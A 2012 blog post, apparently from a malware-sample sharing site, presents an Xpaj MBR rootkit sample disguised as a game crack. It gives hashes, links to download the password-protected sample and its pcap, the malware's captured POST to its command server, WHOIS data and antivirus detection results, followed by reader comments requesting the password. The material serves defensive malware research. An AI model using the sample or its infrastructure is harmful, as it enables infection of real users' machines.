Thursday, May 3, 2012

Xpaj -MBR rootkit sample - sample


News about Xpaj file infector brought this new donation of a sample, which i am posting now. I will add the network capture and sandbox report to augment the detailed analysis reports released by Bitdefender Xpaj - the bootkit edition and Symantec W32.Xpaj.B is a File Infector with a Vengeance
The file is meant to look like a crack of sorts for Big Air Stoked game



I accidentally overwrote this post with a blank one, many thanks to Lotta for sending the cached page and helping recreate it. It was not a long and detailed post but I wouldn't have time to redo it.


File Information

File: arg285172.exe
Size: 224256
MD5:  D5C12FCFEEBBE63F74026601CD7F39B2

Bitdefender Xpaj - the bootkit edition
Symantec  Symantec W32.Xpaj.B is a File Infector with a Vengeance


Download


Download sample (contact me if you need the password)
Download sandbox results in pdf
Download pcap



Traffic Information
POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh HTTP/1.1

Host: nortiniolosto.com
Content-Length: 1279
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Pragma: no-cache
Cache-Control: no-cache
nortiniolosto.com

Justino lupo
Justin luporito (hmaidhd@hotmail.de )
Ellshowell 143
Hershy
Bari,12345
Somalia
Tel. +252.12451254323

P Location:      Virgin Islands, British Road Town Confluence Networks Inc
ASN:    AS40034
Resolve Host:    208.91.198-30.confluence-networks.com
IP Address:    208.91.198.30 
Reverse IP:    1 website uses this address. ( nortiniolosto.com)

NetRange:       208.91.196.0 - 208.91.199.255
CIDR:           208.91.196.0/22
OriginAS:       AS40034
NetName:        CONFLUENCE-NETWORK-INC




Automatic scans
Virustotal
SHA256: 9db7ef2d1495dba921f3084b05d95e418a16f4c5e8de93738abef2479ad5b0da
SHA1: 50281de9abb1bec1b6a1f13ccd3ce3493dee8850
MD5: d5c12fcfeebbe63f74026601cd7f39b2
File size: 219.0 KB ( 224256 bytes )
File name: d5c12fcfeebbe63f74026601cd7f39b2
File type: Win32 EXE
Tags: pecompact
Detection ratio: 27 / 42
Analysis date: 2012-05-02 16:19:12 UTC ( 9 hours, 44 minutes ago )
AntiVir TR/Offend.KD.583315 20120502
Avast Win32:Rootkit-gen [Rtk] 20120502
AVG Agent3.BLMD 20120502
BitDefender Trojan.Generic.KD.583315 20120502
ClamAV Trojan.Xpaj 20120502
Comodo UnclassifiedMalware 20120502
DrWeb Trojan.DownLoader5.61890 20120502
Emsisoft Trojan-Dropper.Win32.Xpaj!IK 20120502
eSafe Suspicious File 20120502
F-Secure Trojan.Generic.KD.583315 20120502
Fortinet W32/Grp.IG!tr 20120502
GData Trojan.Generic.KD.583315 20120502
Ikarus Trojan-Dropper.Win32.Xpaj 20120502
Jiangmin TrojanDropper.Xpaj.d 20120502
Kaspersky Trojan-Dropper.Win32.Xpaj.a 20120502
McAfee Generic.grp!ig 20120502
McAfee-GW-Edition Heuristic.LooksLike.Win32.Suspicious.C!87 20120502
Microsoft Virus:Win32/Xpaj.gen!A 20120502
NOD32 Win32/Agent.TOW 20120502
Norman W32/Xpaj.AA 20120502
nProtect Trojan.Generic.KD.583315 20120502
Panda Generic Malware 20120502
Rising Trojan.Win32.Generic.12C39AA2 20120502
TrendMicro TROJ_DROPPER.VLI 20120502
TrendMicro-HouseCall TROJ_DROPPER.VLI 20120502
VIPRE Trojan.Win32.Generic!BT 20120502
VirusBuster Trojan.Agent!fJDKaCBGD+U 20120502

ssdeep
6144:Gqmg/v4y/MqGs38KHF1SubUriPOKAJnP:jmgXxXGNKHC
TrID
Generic Win/DOS Executable (49.9%)
DOS Executable Generic (49.8%)
Autodesk FLIC Image File (extensions: flc, fli, cel) (0.1%)
F-Prot packer identifier
PecBundle, PECompact
PEiD packer identifier
PECompact 2.xx --> BitSum Technologies
ExifTool

MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
MachineType..............: Intel 386 or later, and compatibles
TimeStamp................: 0000:00:00 00:00:00
FileType.................: Win32 EXE
PEType...................: PE32
CodeSize.................: 73728
LinkerVersion............: 9.0
EntryPoint...............: 0x1000
InitializedDataSize......: 0
SubsystemVersion.........: 5.0
ImageVersion.............: 0.0
OSVersion................: 5.0
UninitializedDataSize....: 0

Portable Executable structural information

Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001000

PE Sections...................:

Name Virtual Address Virtual Size Raw Size Entropy MD5
.text 4096 315392 201728 8.00 46280ae9e3cbad5868c4a7d45cf579c3
.rsrc 319488 24576 20992 4.35 178f207ecb903966eaddaaa6e8adb6a0
.reloc 344064 512 512 0.20 21de6af2a834127775b018f12418d101

PE Imports....................:

kernel32.dll
LoadLibraryA, GetProcAddress, VirtualAlloc, VirtualFree


PE Exports....................:

Symantec Reputation
Suspicious.Insight
ClamAV PUA Engine
Possibly Unwanted Application. While not necessarily malicious, the scanned file presents certain characteristics which depending on the user policies and environment may or may not represent a threat. For full details see: http://www.clamav.net/support/faq/pua.
First seen by VirusTotal
2012-03-29 20:35:10 UTC ( 1 month ago )
Last seen by VirusTotal
2012-05-02 16:19:12 UTC ( 9 hours, 44 minutes ago )
File names (max. 25)

arg285172.exx
d5c12fcfeebbe63f74026601cd7f39b2
d5c12fcfeebbe63f74026601cd7f39b2.exe
9db7ef2d1495dba921f3084b05d95e418a16f4c5e8de93738abef2479ad5b0da.exe
file-3862186_exe
drop/d5c12fcfeebbe63f74026601cd7
42734329
F09ED346009E537F6C5203C0468056001443F72A.exe
arg359624.exe
arg285172.exe

7 comments:

  1. Thanks you offer the sample . May i have the passwd about this sample .( I was conducting my experiment about dectecting malware)

    ReplyDelete
  2. Sorry , Mila , I can't find you email in your profile ...

    ReplyDelete
    Replies
    1. Link under picture in profile says "Email". Click on it and happiness will come

      Delete
  3. Downloading, unpacking a zip file, and firing up suspected file using Ida,
    make me laugh. Seems there are multiple internal loader encryptor routines
    inside. Old school trick, by dumping my memory ram, hopefully would get
    little hints, many thanks Mila :)

    ReplyDelete
  4. Since OC is down we used to get samples in an old, this sux.

    ReplyDelete
  5. Replies
    1. Why is it down? Maybe just today and back up tomorrow.

      Delete